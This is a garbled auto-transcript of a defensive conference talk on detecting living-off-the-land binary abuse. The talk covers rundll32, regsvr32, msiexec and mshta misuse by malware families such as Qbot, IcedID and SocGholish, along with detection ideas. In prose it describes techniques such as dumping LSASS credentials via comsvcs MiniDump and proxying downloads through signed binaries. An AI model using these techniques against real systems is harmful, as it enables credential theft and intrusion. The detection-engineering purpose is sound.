Misbehaving Binaries: Methods to Detect LOLBin Abuse

thank you yeah so today we're going to be talking about weird B binary Behavior you know what to look for uh and I am Rachel schwock I am a detection engineer at Red Canary so I make detectors and hunt for evil across a very wide variety of environments I got my start working as an analyst on a cyber incident response team and I got to admin a wide variety of security tools and wear a lot of hats and in my free time I enjoy reading puzzles Legos and good food so what are lull bins uh so it stands for living off-the land binaries uh these are binaries that are either downloaded from Microsoft or they're already native in the operating

system uh usually they're already native in the operating system um so today on those binaries like you know if you're still confused think of like notepad or Exel uh those are like Microsoft binaries that you can find um today I'll be talking more about default binaries that can be used to download or execute malicious code um so like usually like Powershell and the scripting engines get a lot of love I'm going to talk a bit about rund 32 reged server 32 Ms build MSI exec msh HDA kind of the ones that are maybe The Underdogs uh when comparing it to like Powershell and if you're wondering how often this is seen in threats quite a

bit um in 2022 alone over a third of Red Canary malicious and suspicious detections had lull bins and them and those weren't ones that were testing so that's like excluding all the testing uh and the adversary emulation stuff those were real threats that contain L bins so how do you even get started well you're going to have to learn about the binary first um you're going to want to learn you know what is this binary supposed to be doing normally so that way you even know what to expect if it is behaving in a strange manner uh so some good s our es that are free I really like Echo tril because it gives a

summary of what is it um what is like its normal path that it should be executing from what are you know Common networking ports that this binary uh makes connections on uh what is the normal lineage really good information to just get a baseline on what is normal for execution uh and L bass and the stronic encyclopedia the encyclopedia for executables uh those both give really good examples of normal and detection Logic on like what is kind of weird so it'll give you like oh you know if it's proxying execution this is what that looks like and here's like some good detection logic ideas for that uh Atomic red team is also great for showing how the binary can be abused

uh how you can actually test in your own environment for that method of abuse and see if you're actually you know seeing what you expect to when you build out your logic and then also a shout out for the Red Canary threat detection report because it'll list the binaries and also show like what malware families that we see using these binaries there are plenty of other ones out there but just kind of getting started those are good resources so now we have our sources we're going to try to gather what is normal so kind of keep in mind when you're looking it through this information on what is this binary do uh what is the normal process path should

this binary be making network connections if it does should it be making external network connections should it be you know only maybe reaching out to Microsoft if it's an external connection uh and what are the typical command line parameters uh keep in mind if it always executes with the command line that's something to look for or if it never has command line parameters and if you by chance get a consistent parent or child lineage that's also pretty helpful uh there's a couple out there like SBC host will typically execute by services and so that can also help for some detection ideas and after you kind of Baseline normal you're going to look for how can

this binary be abused uh so you're going to identify abnormal activity and then look at kind of what malware families are doing to abuse that binary so some examples that I put here not relating to any specific binary yet um so like downloading things from a remote resource is pretty abnormal EX cuting with an unexpected command line or maybe no command line at all uh proxying execution through another process uh executing maybe from like a really random folder instead of system 32 and misuse of a legitimate function uh so that'll I'll talk a little bit more about that in a minute but and then you can look at okay I'm going to look at specific threat families uh and see

what they're doing and maybe they're injecting into the process and spawning reconnaissance commands uh or maybe the system binary is being executed by a Microsoft Office binary and renamed and relocated system utilities um this one can really help if you get that metadata of a binary so that way you can see you know if CMD is renamed uh to util man that's something you could pick up just based on that internal naming scheme of the binary all right so now I'm going to walk through an example uh I like rundll32 it's used a lot by various different threats uh so what is rundll32 in the first place so it enables the execution of dynamic link libraries so basically

little code functions that different processes can call uh and it typically executes out of system 32 rsis W 64 if it's a 32-bit system uh and according to Echo tril its most common parents or SVC host Explorer run d32 in spools V uh it's not an exhaustive list though run d32 can have quite a few different parents normally uh it's most common children are going to be run d32 when sat and DF service but also not an exhaustive list there it has been observed making network connections but typically only on 443 and 80 and usually it's going to be to Common network connections or internal network connections and not so much strange you know newly created

domains uh and it also executes with the command line so it's not one of those that executes without one it typically will look like run dll 32 with the dll name and dll function so it should execute with those parameters under normal circumstances all right so looking at some examples of how run dl32 can be abused uh so it can abuse legitimate dlls or export functions to perform malicious actions uh in this case it is calling the Comm services dll and calling the mini dump function to dump Elsas uh and Elsas has a lot of Juicy Secrets it's got you know all the credentials on that local post uh and so that can be abused uh to get credentials

it can execute malicious adversary Supply dlls and it can also use other legitimate functions uh to bypass application control Solutions uh in this one it is calling the dll register server function which normally is used legitimately by reg server 32 because that's the B inary responsible for registering dlls and so when run dll 32 which is supposed to execute DLS uses that function that's something to keep an eye on because it's it's a pretty rare thing for it to legitimately do uh and in this case it's calling you know a text file in the user's public folder uh and so definitely suspect there with the folder containing a definitely not text file so other abnormalities would be run 32

executing JavaScript and Powershell so this would be proxying execution through those processes and initiating a download from a remote source and this example here uh it's calling JavaScript to then call Powershell to then download something from a random IP port combination so a little bit strange for rund to do that uh and then executing a dll in a alternate data stream uh is another method that could be abused uh you got this text file that has a dll referenced inside of it and then calling the dll main function to execute it so it looks you know on the surface like it might just be a text file but it's not and then you've also got the

executing without command line parameters like I said it should always have the DL name and dll function so when it doesn't that could be a sign that something's up now what malware utilizes run dll 32 a lot of them but here are a couple to get us started so cubot you guys might have heard cubot was taken down recently but that cubot had been around for a really long time and so it's still really worth learning its behaviors um and its delivery Affiliates ta 570 and ta 577 they are still around and delivering other things that could behave similarly to cubot uh and so this is a couple examples of what that dll execution looked like for cubot uh where

it was calling from that public documents folder a random dll um and calling it RS3 two function uh and so that use of a strange folder in a dll uh very strange behavior and same with the next one in the program data folder it's calling a JPEG which is not a jpeg uh and it has just a randomly named uh function name of wind so both of those you know qbot would change its delivery method a lot but it would usually like like 90% of the time execute run dll 32 with a weird dll and a weird folder with weird names uh and the other 10% was like red server 32 so so golish is the next one and so

this is one that is like it takes advantage of compromised WordPress sites and leads people to adversary infrastructure to download a browser update uh it tells the user oh my gosh you can't continue your Chrome is so out of date please update and so then they get this this nice little update. JS Javascript file that then executes run dl32 and that's what this looks like here also using the program data folder and using that function that I mentioned earlier is used by Red server 32 legitimately the dll register server function gamaro is another one that is uh uses rund 32 and I like this one because kind of looks like Morse code going on here with the dash d-h

underscores but that is the dll name uh and so it's not redacted or anything that is just what the dll naming scheme is and it's calling that wmsm whatever that's the function name uh and so that's definitely you know you see that and you're like well something's definitely up there that's not normal uh and iced ID is another one that's been around uh as a banking Trojan it steals financial information and uh it's also a dropper for other malware it's been seen dropping ransomware before uh and it will have this dll and the app data roaming test and then another subfolder and what I like about this this one is it calls a ordinal value

function so that hashtag the pound sign whatever you want to call it uh that's the ordinal value for saying like the first function basically in that dll uh and so that's a way that sometimes adversaries will use that to obvious gate what function they're actually calling all right so now we'll move on to kind of what cemetry can we use for good detection opportunities so I like to use command lines um you know we have the option for the no command line we have URLs and command lines and those known abuse mechanisms present so like I mentioned that ordinal value that's a known abuse mechanism the dll register server for run dll it's another one uh the lineage

can be a good one specifically if you see something spawning reconnaissance bands that's usually only going to be done by like CMD if like Recon really necessary in your environment um so when you see like run deal 32 or these other binaries spawning it it's pretty strange you got process paths you know so while we're in d32 with said that it should be in system 32 so if it's not in there and it's in like the public documents folder something to look for uh and the network connections file modif apption the module loads I like to use that usually as a combination of logic uh instead of like the main supporting logic so if I

do something and maybe like no CLI on its own isn't strong enough and I add no CLI with a network connection that's usually going to be uh less prone to false positives so here are what I came up with so for like run 32 um now that we kind of went over what Telemetry I usually look at we'll use that and then say that like process path so if rundl executes and it is not in system 32 or sisw 64 that is something I want to look at if run d32 executes and it spawns JavaScript uh that's something I want to look at if uh MS Office binary so if word spawns run dl32 something else to look at and we

got a ton of them with the command line uh because run 32 does typically use a specific format so run dll with no do dll in the command line like we saw those jpegs and txts that weren't really jpegs because rund 32 shouldn't be executing jpegs uh so look for that but you'll also note with the no. dll you'll have to tune a couple things uh it's like cpls and like oxs are sometimes used legitimately uh but start with the dll and as you need to tune it don't leave it and let it suffer uh and then run D 32 without a command line uh we can look at that and say that it it might be

injected into uh run 32 with h GP in the command line uh it could be trying to download like we saw earlier with it proxy execution through JavaScript to then download through Powershell so look for HTTP in the CLI and then uh with the rare function uh in the command line so like look for that pound signed or the dll register server in the command line when rund dll is executing and apply these ideas to your environment cuz like I said this won't always be 100% true positive to your environment right out of the box so you know if you get something and like it's noisy just tune it out it should take like two to three tuning sessions cuz if

you let it be noisy you're not ever going to catch it when it's catching true positive threats uh and if it's you know if you can't do it with just a few exclusions it's probably not worth detecting in your environment because if you see that alert day in and day out it's just never going to be value to you um so you know try to think of different ways to make that logic better and combine logic to be more specific to certain threats if you need to so now I'm going to talk about more threats and what L bins they use raspberry Robin is a fun one um so it's usually starts through a infected

USB um often they've been used in like Printing and mailing centers uh and raspberry Robin is usually a dropper of other malare it's been seen dropping so goish it's been seen dropping Cobalt strike and iced ID and it likes to use MSI exec so in this case you'll see MSI ex executes with this weird C case lettering and it calls the with the slash QQ for quiet so the user doesn't know anything's downloading and it goes to this website um it's using port 8080 so a little bit abnormal of a port for hdp traffic uh and it is so it has like the host name there it usually will call also with the username so it will usually be like

username SL host name uh and and if that MSI exec network connection is successful it will download a randomly named dll and it'll typically put it in like a subdirectory of program data uh so it also uses run d32 reg server 32 and dll host for follow on C2 activity and so some detection opportunities for this one would be that MSI exec with a command line of http or htps and the SL Q or the TAC Q uh and then also you could look for a command line that does not contain a MSI or a MSP because those are the installer files that MSI exec uh typically will be executing IED ID uh so we showed it with

run dll 32 earlier but it also uses MSI exec uh and so like it was like earlier this year uh the deer report posted a really good write up on an iced ID infection that led to widespread domain spread completely like poned Quantum ransomware across the environment in less than 78 hours so it really moved fast once iced ID dropped uh and so you want to catch this one early for sure uh and so this one it had MSI exec spawning System Info uh but it'll spawn other reconnaissance commands like NL test uh SL doain trust or ip config so look for MSI EXA executing and a child process of System Info ip config net or

NL test uh and some other things that it also used run d32 like we mentioned earlier this was another example of it uh calling a DAT file so that would be caught with run d32 without a dll in the command line and so this is a fun one that uh Red Canary has been tracking this fake browser update threat cluster so so golish is like the OG one that I mentioned earlier uh and recently there's been these other ones come in though like Scarlet Goldfinch uh and this fake SG uh fake SG there's been a write up I think Ma bites has done the best one uh on kind of indepth on what that does to

differentiate it from sock golish but basically these first two they use W script.js files uh to redirect people to these browser updates and it downloads like browser update and then a version number. JS or just update. JS usually for so goish now and fake SG it uses MSHA with HTA files and it has names like a version number. HTA or launcher update. HTA and that's the one I'm going to talk a little bit more about so fake SG is really it's kind of interesting in the fact that it uses four files uh which is a different L bin that you can run a command on a file or pass arguments to multiple files using that and so four files spawned

Powershell and Powershell then spawned MSHA using those wild cards like it's kind of hard to see there but it's Windows system 32 Ms HTA with the little wild card symbols uh and it is calling this compromised WordPress site uh to download this HTA and that'll execute so there is a lot of opportunities with this fake SG strain uh use a four files uh spawning Powershell that's a good detection opportunity there and then mshta with the command line containing HTTP uh is also a great opportunity to look for mshda downloading anything is usually pretty strange uh and then mshda with a parent of Powershell is another good detection opportunity for this threat cluster emotet is one that's been around

a while but I haven't seen it a whole lot this year mostly kind of tapered off at the end of 2022 but uh it like to you know disseminate through emails attachments links uh likes to use macro files for Excel word uh in this case it was word that then spawned reg server 32 uh and reg server 32 then also spawned reg server 32 to execute a dll uh and additional activity that isn't shown uh was that Reg server made outbound network connections and spawn system info and ip config uh so some detection opportunities for this type of threat would be the MS office binary sponding reg survey 32 Red survey 32 with the command line containing app data and not

containing that dll is another good one uh a red server 32 with external network connections excluding connections to very common external like Microsoft domains and red server 32 with a child proc of system info and ip config so now I'm going to talk a little bit about testing cuz like these are real threats but like what do you normally see when people people are testing is it the same is it different and what do red teams usually do you know is it does it hold up so this is a graph I pulled from the threat detection report and one that I really enjoyed it's kind of fuzzy up here but it does point out that a lot of

these L bins are tested just as much in real world threats uh as they are and just like test environments so like mshta is a little fuzzy up there in red server 32 but red server 32 is actually used more in real threats than testing uh and that last one is credential dumping so credential dumping is used way more in testing uh than it was in real threats that we saw uh and Windows command shell pretty even po shells pretty even uh so a lot of them were pretty even but that credential dumping was the one like dang that is tested a lot more than it is actually done and like I said red teams love L

bin you know why why get all these external binaries on the system when you can just run it and they're less likely to see it so they like and from my experience I seen a lot of them do process injection uh so like look for a binary executing with no CLI and then external network connection um look for connections to content delivery networks like cloudfront or fastly that's used a lot uh dumping lsas through rundl 32 with that mini dump function or if you open Task Manager you find Elsas you rightclick and you hit dump it will it'll you got the Elsas dumped memory right there so really easy to do uh and then uh scheduled task registry run Keys

search service execution these can be used for persistence obviously but also privilege escalation because services will execute under system and you can do the same with scheduled tasks uh process and domain account Discovery so look for you know uh trying to look for the domain admins group with the net binary uh and local admins uh running who am I that's usually you know not enough on its own but if it's rarely done in your environment maybe you can get away with looking for it and suspicious directory execution uh so dll side side loading is pretty common look for you know weird system binaries uh executing from like a desktop folder or the public folder uh

and look for it loading in a dll in the same folder because that will usually be the bad dll uh and so that can be used for UAC Bypass or just executing malicious code uh and you should test your systems with you know I'll look for Atomic red team and run those tests in your environment because they're safe to do and you'll know if you will catch it uh when a real threat comes that's all I've got so are there any questions

so when you're saying like internal nwor actually like ad simulation or um I look at that completely different those adversary emulation tools uh they have a very specific process lineage and they look they don't look like somebody hands on keyboard so we really like to look at those like net commands uh spawning uh you know if you're looking for DCS in the domain we're going to take that a lot more seriously than attack IQ executing

yeah where you wouldn't necessarily to be stey he be using a lot of AD you know as a last step

but yeah and so a lot of that like with their Cobalt stripe beacons we'll see a lot of times that process injection piece and they'll like I've seen what's really caught me off guard once was they injected into the open withth binary so we saw open withth connecting to like cloudfront domains and I'm like OV withth doesn't do that you know so I like that's that's good like you if you if they're not using you know binaries you wouldn't think to even monitor like that's a little bit sneakier uh some of like I don't know some red teams are better than others with stealthiness so yeah the best way to harden for catching for they start this

behav so you know you can do several things don't give everyone local admin access is a good start uh you can try to limit you know what files uh do you allow users to execute like if you change for like that Sal goish threat and stuff the JS if you change the default to open in notepad instead of like w script that's a good start because then the user just opens it and they're like it's not working you know instead of like you know they don't see they would still be like oh it's not working my browser didn't update but at least you're not compromised at that point so uh just changing what you know

files you allow to execute maybe what users can execute yeah like w script Powershell maybe not everyone needs to do that down to the app what can the app actually do give forever yeah yeah and just like basically you can do app Whit list day with some stuff or like I really just recommend you know limiting what users are allowed to execute like have certain groups that are like okay this group is like a power user group and they can do this but other users

cannot yeah so on the sides you're talking about running R32 called yeah um I no you had like some images like right are those like like or so they they are not going to be actual images I was trying to see which one was it yeah this cubot one is one so if they they don't try to appear as an image or anything they just try to appear like if somebody is looking in the program data folder and they see a JPEG they're like okay but if you like open the file properties and you look at like you know what is the actual extension then it'll say like dll you know or like a PE file

basically see that work Windows really yeah yeah that cubot magic they like to do that with you know it wasn't just jpegs they would do all kinds of random stuff they would put just like Dot and then just gibberish sometimes and not make it look like a real file extension

so cool well if there's nothing else thank you guys for [Applause]

listening